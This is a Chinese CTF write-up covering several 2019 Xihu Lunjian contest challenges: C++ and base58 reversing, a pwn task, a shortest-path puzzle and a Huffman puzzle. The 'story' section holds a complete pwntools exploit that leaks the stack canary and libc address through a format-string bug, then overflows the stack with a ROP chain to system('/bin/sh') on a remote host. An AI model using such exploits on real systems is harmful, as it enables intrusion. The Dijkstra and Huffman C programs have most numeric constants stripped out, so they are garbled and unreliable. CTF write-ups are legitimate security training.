西湖论剑2019部分writeup

做了一天水了几道题发现自己比较菜，mfc最后也没怼出来，被自己菜哭

easycpp

c++的stl算法，先读入一个数组，再产生一个斐波拉契数列数组

main::{lambda(int)#1}::operator() 是相加函数

使用transform调用lambda(int)#1让数组从第二位到最后一位都加上第一位，然后将数组倒置

把处理后的数组与斐波拉契数组比较，若相等则输出flag，逆向求出输入即可。

testre

大部分代码没有用处，去掉混淆的代码，主要部分是这些

while ( v20 < v28 )
  {
    v21 = *(unsigned __int8 *)(v25input + v20);
    for ( j = n - ; ; --j )
    {
      v10 = ;
      if ( j <= v18 )
        v10 = v21 != ;
      if ( !v10 )
        break;
      v21 += v11[j] << ;
      v11[j] = v21 % 0x3A;
      v21 /= 0x3A;
      if ( !j )
        break;
    }
    ++v20;
    v18 = j;
  }

整个程序就是base58的加密程序，通过谷歌特征值或者看比较字符串也不难发现是base系列算法，线上解密即可。

story

输入的地方有格式化字符串漏洞，checksec发现开启了cannary，泄露cannary的值和libc_main的地址

第二个输入的地方有栈溢出，把返回地址覆盖为system函数

因为是64位程序，所以“/bin/sh”参数要存在rdi寄存器（RDI RSI RDX RCX R8 R9）

因为上述

ROPgadget --binary story --only 'pop|ret' | grep 'rdi'  #找到rop链存参数"/bin/sh"

from pwn import *
context.log_level = 'debug'
elf = ELF('./story')
# p = process('./story')
p = remote('ctf2.linkedbyx.com', 10855)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
p.recvuntil("Please Tell Your ID:")
# raw_input()
p.sendline("%23$p %25$p")
p.recvuntil('Hello ')
canary = int(p.recvuntil(' '), 16)
print('canary:' + hex(canary))
__libc_start_main = int(p.recvuntil('\n'), 16)-240
print('__libc_start_main:' + hex(__libc_start_main))
libc.address = __libc_start_main - libc.symbols['__libc_start_main']
system = libc.symbols['system']
print('system:' + hex(system))
binsh = next(libc.search('/bin/sh'))
print('binsh_addr:' + hex(binsh))

p.recvuntil('Tell me the size of your story:\n')
p.sendline(str(129))

p.recvuntil('You can speak your story:')
payload = 'a'*0x88 + p64(canary) + p64(0) + p64(0x400bd3) + p64(binsh) + p64(system)
p.sendline(payload)
p.interactive()

最短路径

就是求最短路的题目，数据量很少手动也能做出来，使用 dijkstra算法算出最短路径和经过的路径。

#include<iostream>
#include<cstdio>
#include<cstring>
using namespace std;
const int INF=0x3f3f3f3f;
int matrix[][],d[],vis[],pre[],path[];
int n=;

/*
'flag{' 1
'FloraPrice' 2
'E11' 3
'E9' 4
'75D}' 5
'NoraFayette' 6
'E10' 7
'E13' 8
'E12' 9
'E14' 10
'E7' 11
'E6' 12
'SylviaAvondale' 13
'MyraLiddel' 14
'HelenLloyd' 15
'KatherinaRogers' 16
'VerneSanderson' 17
'E8' 18
'FrancesAnderson' 19
'E3' 20
'DorothyMurchison' 21
'EvelynJefferson' 22
'E5' 23
'E4' 24
'E1' 25
'E2' 26
'RuthDeSand' 27
'OliviaCarleton' 28
'EleanorNye' 29
'TheresaAnderson' 30
'PearlOglethorpe' 31
'BrendaRogers' 32
'LauraMandeville' 33
'CharlotteMcDowd' 34
*/

void dijkstra(int s){
    for(int i=;i<=n;i++){
        d[i]=matrix[][i];
        pre[i]=s;
    }
    memset(vis,,sizeof(vis));
    for(int k=;k<=n;k++){
        int v=-;
        for(int i=;i<=n;i++){
            if(!vis[i]&&(v==-||d[i]<d[v]))v=i;
        }
        vis[v]=;
        for(int i=;i<=n;i++){
            int tmp=d[v]+matrix[v][i];
            if(tmp<d[i]){
                d[i]=tmp;
                pre[i]=v;
            }
        }
    }
}
void printPath(int en){
    printf("从起点到%d的路径是：\n",en);
    path[]=en;
    int k=;
    for(int i=pre[en];i!=;i=pre[i]){
        path[k++]=i;
    }
    printf("");
    for(int i=k-;i>=;i--){
        printf("->%d",path[i]);
    }
    printf("\n");
}

int main(){
    for(int i=;i<=n;i++){
        for(int j=;j<=n;j++){
            matrix[i][j]=;
        }
    }
matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=,matrix[][]=;
for(int i=;i<=n;i++){
        for(int j=;j<=n;j++){
            if (matrix[i][j]!=)
            matrix[j][i]=matrix[i][j];
        }
    }

    dijkstra();
    printPath();
}

哈夫曼之谜

哈夫曼编码问题，左边字符右边权重，网上找个类似问题改下代码

const int maxvalue=;
const int maxbit=;
const int maxn=;
#include "iostream"
#include "stdio.h"
#include "string.h"
#include "stdlib.h"
using namespace std;
struct haffnode
{
     char ch;
    int weight;
    int flag;
    int parent;
     int leftchild;
    int rightchild;
};
struct code
{
    int bit[maxn];
    int start;
    int weight;
    char ch;
};
void haffman(int weight[],char text[],int n,haffnode hafftree[])
{
    int j,m1,m2,x1,x2,i;
    for(i=;i< *n-;i++)
    {
        if(i < n)
        {
            hafftree[i].weight=weight[i];
            hafftree[i].ch=text[i];
        }
        else
         {
            hafftree[i].weight=;
            hafftree[i].ch='#';
        }
        hafftree[i].parent=;
        hafftree[i].flag=;
        hafftree[i].leftchild=-;
        hafftree[i].rightchild=-;
    }
    for(i=;i< n-;i++)
    {
        m1=m2=maxvalue;
        x1=x2=;
        for(j=;j<n+i;j++)
        {
            if(hafftree[j].weight<m1&&hafftree[j].flag==)
            {
                m2=m1;
                x2=x1;
                m1=hafftree[j].weight;
                 x1=j;
            }
            else if(hafftree[j].weight< m2&&hafftree[j].flag==)
             {
                m2=hafftree[j].weight; x2=j;
             }
        }
            hafftree[x1].parent=n+i;
            hafftree[x2].parent=n+i;
             hafftree[x1].flag=;
            hafftree[x2].flag=;
            hafftree[n+i].weight=hafftree[x1].weight+hafftree[x2].weight;
            hafftree[n+i].leftchild=x1; hafftree[n+i].rightchild=x2;
     }
}
void haffmancode(haffnode hafftree[],int n,code haffcode[])
{
    code cd; int i,j; int child,parent;
     for( i=;i< n;i++)
     {
        cd.start=n-;
        cd.weight=hafftree[i].weight;
        cd.ch=hafftree[i].ch;
        child=i;
        parent=hafftree[child].parent;
        while(parent!=)
         {
            if(hafftree[parent].leftchild==child)
            cd.bit[cd.start]=;
            else cd.bit[cd.start]=;
            cd.start--;
            child=parent;
            parent=hafftree[child].parent;
        }
        for(j=cd.start+;j<n;j++)
        haffcode[i].bit[j]=cd.bit[j];
         haffcode[i].start=cd.start;
         haffcode[i].weight=cd.weight;
        haffcode[i].ch=cd.ch;
     }
}
void ccode(haffnode hafftree[],int n)
{
    int i,j=,m=*n-;
    char b[maxn];
    memset(b,'\0',sizeof(b));
    i=m-;
    scanf("%s",b);
    while(b[j]!='\0')
    {
        if(b[j]=='')
            i=hafftree[i].leftchild;
        else
            i=hafftree[i].rightchild;
        if(hafftree[i].leftchild==-)
        {
            printf("%c",hafftree[i].ch);
            i=m-;
        }
        j++;
    }
}
int main( )
{
    int n=;
    int weight[]={, , , , ,,,,};
    char text[]={'a','','{','f','g','','d','}','l'};
    haffnode myhafftree[maxvalue];
    code myhaffcode[maxvalue];
    haffman(weight,text,n,myhafftree);
    haffmancode(myhafftree,n,myhaffcode);
    ccode(myhafftree,n);
    return ;
}

输出flag